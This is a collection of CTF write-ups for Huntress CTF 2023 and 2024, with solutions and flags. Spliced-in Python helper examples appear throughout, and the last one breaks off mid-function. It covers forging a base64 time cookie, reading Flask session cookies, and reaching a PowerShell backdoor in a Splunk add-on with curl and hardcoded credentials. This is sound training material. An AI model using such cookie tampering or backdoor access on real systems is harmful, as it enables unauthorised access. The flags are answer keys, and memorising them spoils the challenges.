Accessing that link gets us on this hidden server and we have the flag in the channel with the same name:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/11fece46-a83e-4722-8098-8580d07a73a3)

flag{bb1dcf163212c54317daa7d1d5d0ce35}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Misc/I_Wont_Let_You_Down.md:
--------------------------------------------------------------------------------
# I Wont Let You Down

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/30fa05b7-e4af-4981-bd54-fdf1e64cc978)

### Solution
This was a pretty straightforward challenge as it told us what to do every step of the way. First we go take a look at the IP:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/086cd285-3a77-434e-8649-9f9d12cc6d6c)

The website tells us that it is okay to use nmap so that's what we do:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/34a35792-e1bc-47f9-b30b-32bac136b353)

We see another HTTP port open, `8888`, so we access that and get the flag from the bottom of the page:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c94b1fd6-c15e-414c-97e5-415f22774844)

flag{93671c2c38ee872508770361ace37b02}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Misc/Who_is_Real?.md:
--------------------------------------------------------------------------------
# Who is Real?

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8e44f69e-1228-4208-ad28-a7008dc78d41)

### Solution
When we access the website we see two faces and we have to decide which one is real:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/abbba3e8-a944-487d-b841-497294da585c)

If we intercept the request with Burp Suite though, we can see it's setting a Flask cookie.
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4b5da9b5-1d43-4c3b-b33d-5b061402e0ba)

Using `flask-unsign`, which you can install with `pip install flask-unsign`, we can see that it reveals the correct answer:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3fad70cc-6f41-4e3b-a2c1-9ee1a934263f)

We just need to hover our mouse over the images, see which one has the specified GUID and then click on it. We can repeat this until we get the streak that we need:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45adeaf3-df91-438b-9622-76cacc3fc3a3)

Once we hit the streak of 5/5 we get our flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45841514-5c2f-44e5-a275-75e9109e8634)

This was a nice and easy challenge. What would've made it better would've been a longer streak to encourage scripting these steps.
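What `flask-unsign` exploits here is that Flask's session cookie is signed but not encrypted, so its contents are readable by whoever holds it. As an added example (not the author's code), the function below reads the payload of a Flask session cookie in pure Python; `make_demo_cookie`, its placeholder timestamp and signature, and the GUID in the demo session are constructed for this example and are not the challenge's real values.

```python
"""Read the payload of a Flask session cookie (added example, not from the write-up).

Flask signs its session cookie with itsdangerous but does not encrypt it. The
cookie is "<payload>.<timestamp>.<signature>", where the payload is URL-safe
base64 of the session JSON (padding stripped), prefixed with '.' when it was
zlib-compressed. Anyone holding the cookie can read what the server stored in
it, which is why a "correct answer" must never live in a client-side session.
"""
import base64
import json
import zlib


def _b64_decode(data: str) -> bytes:
    """URL-safe base64 decode, restoring the padding that itsdangerous strips."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def read_flask_session(cookie: str) -> dict:
    """Return the session dict stored in a Flask cookie without knowing the secret key.

    Only the payload segment is decoded; the signature is not verified, so the
    result shows what the client can see, not whether the cookie is genuine.
    """
    compressed = cookie.startswith(".")
    payload = cookie[1:] if compressed else cookie
    # Everything after the first '.' is the timestamp and signature.
    payload = payload.split(".", 1)[0]
    raw = _b64_decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def make_demo_cookie(session: dict, compress: bool = False) -> str:
    """Constructed cookie in Flask's layout with a placeholder timestamp and signature.

    Hypothetical helper for this example only: a real cookie's trailing segments
    are produced by itsdangerous with the application's secret key.
    """
    raw = json.dumps(session, separators=(",", ":")).encode()
    if compress:
        raw = zlib.compress(raw)
    payload = base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    cookie = f"{payload}.Zz0000.placeholder-signature"
    return "." + cookie if compress else cookie


if __name__ == "__main__":
    # Constructed session: the key name and GUID are illustrative, not the challenge's.
    demo = {"real": "00000000-0000-4000-8000-000000000000", "streak": 3}
    for compress in (False, True):
        cookie = make_demo_cookie(demo, compress=compress)
        print(cookie)
        print(read_flask_session(cookie))
```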

flag{10c0e4ed5fcc3259a1b0229264961590}

--------------------------------------------------------------------------------
/Huntress-CTF-2023/OSINT/Operation_Not_Found.md:
--------------------------------------------------------------------------------
# Operation Not Found

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0602316f-bcf3-4d63-9d73-655d0cb9a1df)

### Solution
Accessing the provided link, we can see a building and the name of a company:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7fc69a62-5409-44c0-a749-b89e945da88a)

After wasting a lot of time looking around for different office buildings where this company would be, I decided to take a cropped screenshot of the building all zoomed out. I uploaded it into the Russian site https://yandex.com:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/df70504c-b2cb-4eca-9d23-bae767e319b0)


The very first result shows a very similar building and indicates this is the Georgia Tech Library:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/948d27e6-277a-48ef-a759-5872a7e84c25)

But that's quite a big place. Taking a closer look at the picture that Yandex found, we can see the building sign is still on it. In our picture it was taken down. It says it's the `Crosland Tower`, which helps narrow it down even further.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/db5e45ba-6291-4da3-bed4-72441e79a086)

We find that in the challenge map and get our flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8b10803a-dacb-40e0-8305-1d95ed15127f)


flag{c46b7183c9810ec4ddb31b2fdc6a914c}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/OSINT/Where_am_I?.md:
--------------------------------------------------------------------------------
# Where am I?

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c274f7bf-a8c1-495e-a974-8434e4fc4369)

### Solution
This one seemed closer to Stego than OSINT, but indeed, for OSINT situations where you have some pictures to analyze, you would look at the metadata first. There was a lot of metadata in this picture, including GPS coordinates, which I wasted some time on.

But then I scrolled up and saw the `Image Description`:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45b0f7d2-c18b-422c-8d31-b4237e47fe09)

Now we can get the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d8ef451d-47e1-420a-b4f3-85b5efefc369)

A bash one-liner like this would do it:

```bash
exiftool -ImageDescription PXL_*.jpg|awk '{print $4}'|base64 -d
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/45674d5e-8397-4cee-8ed6-5c19b3eebedb)

flag{b11a3f0ef4bc170ba9409c077355bba2)
--------------------------------------------------------------------------------
/Huntress-CTF-2023/README.md:
--------------------------------------------------------------------------------
This was a month-long CTF in which they released 2 challenges per day. In the last week it was only 1 per day.
It was fun and kept me engaged throughout the month with nice challenges that helped me learn a lot and add some tools to my toolkit. Sadly I'm missing BlackCat 2 and Crab Rave.

I finished 100th out of 4212 teams playing solo.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/00288ee7-b8a5-4c09-8421-19cfc2fb7f58)
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Stego/Land_Before_Time.md:
--------------------------------------------------------------------------------
# Land Before Time

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/21e6fbd9-94f1-4810-ace4-c9d10bef0551)

### Solution
The challenge description indicates the tool we should be using: `iSteg`. A quick Google search helps us find it:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/38766877-410b-4c69-85a2-5f540deb1f19)

We can find a pre-compiled binary here:
https://github.com/rafiibrahim8/iSteg/releases

Being a Java application, we can open it using the syntax below:

```bash
java -jar iSteg-v2.1_GUI.jar
```

Once we open our provided PNG file, we get our flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/36521aa0-786c-4658-9e7b-6d333b832282)

flag{da1e2bf9951c9eb1c33b1d2008064fee}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Baking.md:
--------------------------------------------------------------------------------
# Baking

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5d1039ad-af74-4ccb-9e47-859df2b6fdf8)

### Solution
Accessing the web page we see we can bake some cookies. The Magic Cookies however seem to take 7200 minutes, which is forever...
not something we have time for:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1c7ec7a6-4b24-4e5a-b213-40ad5c486f5a)

We also see that a cookie is set when baking the cookie:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8a50dc79-5d4c-4cac-98be-a57543e87a2f)

```bash
echo 'eyJyZWNpcGUiOiAiTWFnaWMgQ29va2llcyIsICJ0aW1lIjogIjEwLzE0LzIwMjMsIDE1OjUzOjUwIn0='|base64 -d
```
Decoding this cookie, we can see it's a JSON object which includes the time for when the cookie would be done.
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c212758e-5049-475f-bff9-3151b590ad46)

```bash
echo -n '{"recipe": "Magic Cookies", "time": "10/14/2022, 15:53:50"}'|base64 -w0
```

We changed the year to put it in the past:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fe203bbd-b62b-4020-9285-c5b964aa8b75)

Now that we have a new cookie, we replace it in the browser and refresh to get the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b2ae3a8b-0910-483d-b5a2-3aca77b211a6)

flag{c36fb6ebdbc2c44e6198bf4154d94ed4}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/BaseFFFF+1.md:
--------------------------------------------------------------------------------
# BaseFFFF+1

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/34d9db40-87f8-412a-add8-8f0c7d7cf533)

### Solution
Reading the file, we get some symbols that are very unfamiliar:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d472eebc-5ca6-44af-8652-3448a78eff1e)

This is the content:
```text
鹎驣𔔠𓁯噫谠啥鹭鵧啴陨驶𒄠陬驹啤鹷鵴𓈠𒁯ꔠ𐙡啹院驳啳驨驲挮售𖠰筆筆鸠啳樶栵愵欠樵樳昫鸠啳樶栵嘶谠ꍥ啬𐙡𔕹𖥡唬驨驲鸠啳𒁹𓁵鬠陬潧㸍㸍ꍦ鱡汻欱靡驣洸鬰渰汢饣汣根騸饤杦样椶𠌸
```
A quick Google helps us determine that `ffff` in decimal is
actually just 65535:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c3b0ff12-c493-40d7-b1d5-b0ffa55749ef)

Since 65535 + 1 = 65536, let's search and see if `base65536` is actually a thing:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7911c009-3c6b-4a29-be03-ce480d801095)

We seem to be on the right track as we have results indicating that this does in fact exist. We can use this online decoder and get our flag:
https://www.better-converter.com/Encoders-Decoders/Base65536-Decode

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/01d00640-fa35-42db-accd-58c7a50b794c)

flag{716abce880f09b7cdc7938eddf273648}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Book_By_Its_Cover.md:
--------------------------------------------------------------------------------
# Book By Its Cover

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/33e93054-d1c3-4054-b9d8-ac66daf17e49)

### Solution
This is a challenge that shows the importance of common commands such as `file`. This doesn't apply just in CTFs.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e015e05c-51ec-4882-a452-52b876945f4f)

Because we now know that the "archive" is in fact a picture, we rename it.
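What `file` does here is read the leading bytes and ignore the extension. As an added example (not the author's code), the script below performs that check for the formats met across these write-ups: the PNG labelled `.rar` here, the compress'd `.Z` in Comprezz, the GIMP XCF in Layered Security, the SQLite-backed `.fossil` in Ancient Fossil and the `CMMM` thumbcache header in Opposable Thumbs. The sample headers in the demo are constructed.

```python
"""Identify a file by its magic bytes instead of its extension (added example).

Not the write-up author's code. The table covers the formats seen across these
challenges plus a few common containers; all signatures sit at offset 0.
"""
import sys
from pathlib import Path

# (magic bytes at offset 0, human-readable type, extensions that agree with it)
MAGIC_TABLE = [
    (b"\x89PNG\r\n\x1a\n", "PNG image", (".png",)),
    (b"\xff\xd8\xff", "JPEG image", (".jpg", ".jpeg")),
    (b"Rar!\x1a\x07", "RAR archive", (".rar",)),
    (b"PK\x03\x04", "ZIP container", (".zip", ".jar", ".docx", ".xlsx")),
    (b"\x1f\x9d", "compress'd data (.Z)", (".z",)),
    (b"\x1f\x8b", "gzip data", (".gz", ".tgz")),
    (b"gimp xcf ", "GIMP XCF image", (".xcf",)),
    (b"SQLite format 3\x00", "SQLite 3 database", (".db", ".sqlite", ".fossil")),
    (b"CMMM", "Windows thumbcache", (".db",)),
    (b"%PDF", "PDF document", (".pdf",)),
    (b"\x7fELF", "ELF executable", ("",)),
    (b"MZ", "DOS/PE executable", (".exe", ".dll")),
]


def identify(header: bytes) -> tuple:
    """Return (type, extensions) for the longest matching signature, or ('data', ())."""
    best = None
    for magic, kind, exts in MAGIC_TABLE:
        if header.startswith(magic) and (best is None or len(magic) > len(best[0])):
            best = (magic, kind, exts)
    if best is None:
        return ("data", ())
    return (best[1], best[2])


def check(name: str, header: bytes) -> dict:
    """Compare the declared extension of `name` with what its header says.

    Returns the detected type, whether the extension agrees with it, and the
    name to rename to when it does not (what the write-ups do with `mv`).
    """
    kind, exts = identify(header)
    ext = Path(name).suffix.lower()
    ok = kind == "data" or ext in exts
    rename_to = None
    if not ok and exts and exts[0]:
        rename_to = Path(name).stem + exts[0]
    return {"name": name, "type": kind, "extension_ok": ok, "rename_to": rename_to}


def check_path(path: str) -> dict:
    """Read the first 32 bytes of a file on disk and run check() on them."""
    with open(path, "rb") as fh:
        return check(Path(path).name, fh.read(32))


if __name__ == "__main__":
    # Constructed headers standing in for the challenge files.
    samples = {
        "book.rar": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
        "comprezz": b"\x1f\x9d\x90f\x98\x0c",
        "thumbcache_256.db": b"CMMM\x1f\x00\x00\x00",
    }
    for name, hdr in samples.items():
        print(check(name, hdr))
    for path in sys.argv[1:]:
        print(check_path(path))
```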

```bash
mv book.rar book.png
```
Opening the picture, we get the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c3f5ec92-3b11-47f1-ab43-657e91e09bf3)

To make it easier on us, we can use `tesseract`, a great OCR tool, to get the text out of the picture, since we don't want to make any mistakes when manually transcribing it:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c245d93b-1a51-4563-95ff-ca84a1a2e7d8)

This creates a flag.txt file containing our flag.
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b38e63ed-fe67-4756-93fc-ca65b095de58)

flag{f8d32a346745a6c4bf4e9504ba5308f0}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/CaesarMirror.md:
--------------------------------------------------------------------------------
# CaesarMirror

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/69d8126e-d28d-45eb-8651-c34a1fce0dbc)

### Solution
Reading the provided file, we see two columns of text:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c1608fea-391c-4139-a6f9-5d33e2932557)

The name of the challenge, as well as the way the text looks, makes me think of `rot13`, so I apply it to the file. The left column decodes and gives us the first part of the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9d4312bb-9a3e-46f4-a35a-94c9a17f327a)

```text
flag{julius_
```
We use a text editor to carve out only the second column after applying `rot13`, and save it separately.
If you look closely enough, the last word is Caesar spelled backwards, so let's apply `rev` on this column:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/997bd908-1475-47c8-9cd2-a51f170104e6)

It was successful and we have our 2nd and 3rd parts of the flag. Putting it all together we get:

flag{julius_in_a_reflection}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Chicken_Wings.md:
--------------------------------------------------------------------------------
# Chicken Wings

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c474f897-9a86-4095-874d-5216a3e34ee9)

### Solution
Reading the file shows us what at first may look like emoji.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6b74b0b6-3312-4528-8c9d-dea53f2f9244)

We can use this very handy website, especially for CTFs, to identify what we are looking at:
https://www.dcode.fr/cipher-identifier
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1b499469-252a-4fad-bee3-f9c261b06685)

It seems it's not emoji but actually just the Wingdings font, which makes sense given the name of the challenge.

https://www.dcode.fr/wingdings-font
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/122f10b9-4e29-4e76-b9b9-9feca778ed1b)

flag{e0791ce68f718188c0378b1c0a3bdc9e}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Comprezz.md:
--------------------------------------------------------------------------------
# Comprezz

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4762a806-d48f-4315-8b18-4fed0ac0965b)

### Solution
Running the `file` command on this, we get a strange message:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/79e0da56-e053-4142-816a-95e67261b563)

A quick Google search seems to indicate this is a `.z` file:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5990af18-e103-4a4e-89d3-cc58716b4001)

On this link, we can find this information:
https://stackoverflow.com/questions/12168081/how-can-i-uncompress-z-file-under-ubuntu
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/20e1be55-4610-4258-80ca-d699fe2353bb)

So let's go ahead and rename the file and try to uncompress it:

```bash
mv comprezz comprezz.z
uncompress comprezz.z
```
It works, and we get a file that we can read:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5b272514-713d-4fc8-b331-02844b6eaab6)

flag{196a71490b7b55c42bf443274f9ff42b}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/F12.md:
--------------------------------------------------------------------------------
# F12

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4df876e9-24b8-4a11-a78b-0175b0376858)

### Solution
Accessing the provided link, we can see a
page with just a button on it:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9ad5eee9-4d00-4233-a749-843c5d994deb)

Intercepting with `Burp Suite`, we can see the page that's opened once the button is pressed, so there is no need to race against time and try F12 on the little window that opens and closes very quickly.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2ed4a2e1-4549-4c23-a97d-05dcc81edeb8)

flag{03e8ba07d1584c17e69ac95c341a2569}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Layered_Security.md:
--------------------------------------------------------------------------------
# Layered Security

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/493eb329-1441-4611-9594-77454df58982)

### Solution
As usual, we start by running the `file` command on the provided file and we see it's a GIMP file:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e53c67dd-9a0f-4eef-9acc-aaa32943f77e)

I searched online for ways to open this without installing GIMP:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c75b3178-d615-49d1-9ae2-f1f2400ef730)

The first result in DuckDuckGo was very helpful. I don't recommend searching for these kinds of tools using Google as you get a lot of ads and shady websites.
https://fixthephoto.com/online-gimp-editor.html

Uploading the file in this tool, we can see a bunch of pictures in various layers, hence the name of the challenge.
Even in the thumbnail, you can see that Layer #3 isn't just a picture:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e460fa42-3be3-4363-ac1f-d3dc382ca362)

In fact, if we click on the small eye icon for the top pictures to hide them, we get to this layer and get the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ff2db2da-33ca-428e-a41a-edfd94e23cb2)

flag{9a64bc4a390cb0ce31452820ee562c3f}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Notepad.md:
--------------------------------------------------------------------------------
# Notepad

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/336f3497-b32f-4e5f-983a-722dbb83410e)

### Solution
All we have to do for this warmup challenge is read the provided file:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c5d468ad-3642-4fd0-a43d-d737a2e7d422)

flag{2dd41e3da37ef1238954d8e7f3217cd8}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Query_Code.md:
--------------------------------------------------------------------------------
# Query Code

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/212398a3-8168-4411-876b-68042c729f49)

### Solution
After we download the file, we can find out it is actually a PNG:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0ded0ea7-c6da-4a66-9511-d76f8cc68076)

We rename the file to give it the .png extension and open it:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1b97e82c-e1de-449a-a76f-77c53805a782)

Now that we know this is a QR Code, we can use `zbarimg` to scan it and print out the text in it:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e11f0248-6f94-4290-8e4f-9fb1ec46b8d9)

flag{3434cf5dc6a865657ea1ec1cb675ce3b}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Read_The_Rules.md:
--------------------------------------------------------------------------------
# Read the Rules

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/aedaaa9c-cea5-4a8c-9b5a-de65392be143)

### Solution
As usual, we can find this flag in the source code of the rules page:
https://huntress.ctf.games/rules

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4154ac87-fcd5-4006-a206-6e0093d7f29b)

flag{90bc54705794a62015369fd8e86e557b}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/String_Cheese.md:
--------------------------------------------------------------------------------
# String Cheese

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1719c38e-bf20-4245-8410-6b677b1ee799)

### Solution
This is a very important thing to remember: always use `strings` + `grep` in CTFs, always!

As the name implies, use `strings`:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4a7a5085-cbfa-4411-a1d3-ce1016537fc7)


flag{f4d9f0f70bf353f2ca23d81dcf7c9099}
--------------------------------------------------------------------------------
/Huntress-CTF-2023/Warmups/Technical_Support.md:
--------------------------------------------------------------------------------
# Technical Support

### Challenge Description
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8e90b58d-5c80-4d22-8f74-94dc6fd36c23)

### Solution
After we join the Discord, we can find the flag in the `ctf-open-ticket` channel.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/55db9ad9-96f8-45fb-8407-98cf71864c08)

flag{a98373a74abb8c5ebb8f5192e034a91c}
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Crypto/No_need_for_Brutus.md:
--------------------------------------------------------------------------------
# No need for Brutus

![image](https://github.com/user-attachments/assets/282ccb11-f7bd-4ea4-b882-f80bfad01710)

## My Solution

The title is a clear reference to Caesar and the Caesar cipher, of which ROT13 is the shift-13 special case.
However, in this case, using [cyberchef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,10)&input=c3F1aXFoeWlpeWNmYnVkZWR1dXR2ZWhyaGtqa2k) we just need to rotate by 10 to find a readable string:

![image](https://github.com/user-attachments/assets/6fe3f1fe-8665-4a9d-b211-e1cae59b59b8)

And then MD5 sum it using [cyberchef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,10)MD5()&input=c3F1aXFoeWlpeWNmYnVkZWR1dXR2ZWhyaGtqa2k), since we are already in it, to get the correct hash for the flag:

![image](https://github.com/user-attachments/assets/89e713f8-4748-42d5-bb32-3ed718b30ef8)

flag{c945bb2173e7da5a292527bbbc825d3f}
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Forensics/Ancient_Fossil.md:
--------------------------------------------------------------------------------
# Ancient Fossil

![image](https://github.com/user-attachments/assets/3255f8ce-5291-4651-abdb-3d3625ff1c01)

Download: [ancient.fossil](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/ancient.fossil)

## My Solution

Based on the header, this file looks to be an SQLite3 database. There were a few different things in it, like this rebuild hash for instance:

![image](https://github.com/user-attachments/assets/409bfeca-5f3c-467d-98df-3a68fda331d4)

I didn't know what that was, so I googled it:

![image](https://github.com/user-attachments/assets/1e9d919c-fc00-47a1-aeb0-03e762e71376)

It seems that this is part of something called [fossil-scm](https://fossil-scm.org/home/uv/download.html). There are a few things this tool can do, including treating a .fossil file as a git repo and letting us export it:

```bash
./fossil export --git ancient.fossil | grep flag
```

I did so while grepping for the flag and found it.

`flag{2ed33f365669ea9f10b1a4ea4566fe8c}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Forensics/Backdoored_Splunk_II.md:
--------------------------------------------------------------------------------
# Backdoored Splunk II

![image](https://github.com/user-attachments/assets/9e700c40-b597-40a9-8196-809fd7f894bf)

Download: [Splunk_TA_windows.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/Splunk_TA_windows.zip)

## My Solution

This is very similar to the [Backdoored Splunk](https://github.com/LazyTitan33/CTF-Writeups/blob/main/Huntress-CTF-2023/Forensics/Backdoored_Splunk.md) challenge from last year. This time we find something suspicious in the `dns-health.ps1` file:

![image](https://github.com/user-attachments/assets/52f5eb82-1d80-4727-b125-c74fe7ca5105)

We see a bunch of bytes being joined together and then passed to IEX. I changed that to pass it to echo instead, which reveals a base64 blob:

![image](https://github.com/user-attachments/assets/148147f3-4f30-4853-9f04-f42763219b04)

Decoding that further, we can see it doing an Invoke-WebRequest with a specific Authorization Basic header and some base64 encoded credentials.
We just need to make the same request, replacing the port with the one given by the challenge, and we get our flag:

```bash
curl -s -u backdoor:this_is_the_http_server_secret http://challenge.ctf.games:32557 | awk '{print $2}' | base64 -d | awk '{print $2}'
```

![image](https://github.com/user-attachments/assets/961a2607-de9c-4a49-a4de-a32d81b844dd)

`flag{e15a6c0168ee4de7381f502439014032}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Forensics/Hidden_Streams.md:
--------------------------------------------------------------------------------
# Hidden Streams

![image](https://github.com/user-attachments/assets/cd2f27da-cee4-4c96-acef-0af076b411a2)

Download: [Challenge.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/challenge-hidden-streams.zip)

## My Solution

I'm sure there are better ways to do this challenge; however, what I usually do is convert the `.evtx` files to something human readable. For this purpose I used the [EvtxECmd.exe](https://github.com/EricZimmerman/evtx) tool to convert the files to `.csv`.

```powershell
.\EvtxECmd.exe -f C:\windows\tasks\Sysmon.evtx --csv c:\windows\tasks --csvf system.csv
```

I looked for PowerShell commands to see if any were used:

![image](https://github.com/user-attachments/assets/333b500d-1fc4-4a00-aaec-e485b2bf4395)

We can see a base64 string in a result, so we just decode it and get the flag.

```bash
echo 'ZmxhZ3tiZmVmYjg5MTE4MzAzMmY0NGZhOTNkMGM3YmQ0MGRhOX0=' | base64 -d
```

`flag{bfefb891183032f44fa93d0c7bd40da9}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Forensics/Keyboard_Junkie.md:
--------------------------------------------------------------------------------
# Keyboard Junkie

![image](https://github.com/user-attachments/assets/8c4ea730-f8d5-41a0-8c18-49cb4ec7714b)

Download: [keyboard_junkie](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/keyboard_junkie)

## My Solution

When opening the provided file in Wireshark, I could see USB traffic. I've done these kinds of challenges in the past but couldn't remember the tool, so I googled it:

![image](https://github.com/user-attachments/assets/521d0942-96a6-4332-acbf-17d9b2961d19)

Using [this](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) tool allows us to decode keyboard traffic, but first we need to extract the traffic:

```bash
tshark -r keyboard_junkie -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > usbPcapData
```

Here we are using tshark to extract just the USB packets that have a data length of 8 and inserting a `:` every two characters to get the format recognized by the tool.
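As an added example that is not the writeup's code nor either of the linked parsers, the following Python decodes that colon-separated 8-byte report format directly (modifier byte, reserved byte, up to six key usage IDs); its sample capture is constructed and exercises a shifted key, a held key and a backspace.

```python
"""Decode USB HID keyboard reports in the colon-separated form written above.

Added example, not part of the writeup or of the linked parser tools.
Input assumed: one 8-byte report per line as 'aa:bb:cc:...' hex, which is
what the tshark | sed pipeline produces. The capture below is constructed.
"""

# HID usage IDs for a US layout: usage -> (unshifted, shifted). 0x04 is 'a'.
_LETTERS = "abcdefghijklmnopqrstuvwxyz"
USAGE_MAP = {0x04 + i: (ch, ch.upper()) for i, ch in enumerate(_LETTERS)}
USAGE_MAP.update({0x1E + i: (d, s) for i, (d, s) in
                  enumerate(zip("1234567890", "!@#$%^&*()"))})
USAGE_MAP.update({
    0x28: ("\n", "\n"), 0x2B: ("\t", "\t"), 0x2C: (" ", " "),
    0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"), 0x30: ("]", "}"),
    0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'), 0x35: ("`", "~"),
    0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2A
SHIFT_MASK = 0x02 | 0x20   # left shift and right shift bits of the modifier byte


def parse_report(line):
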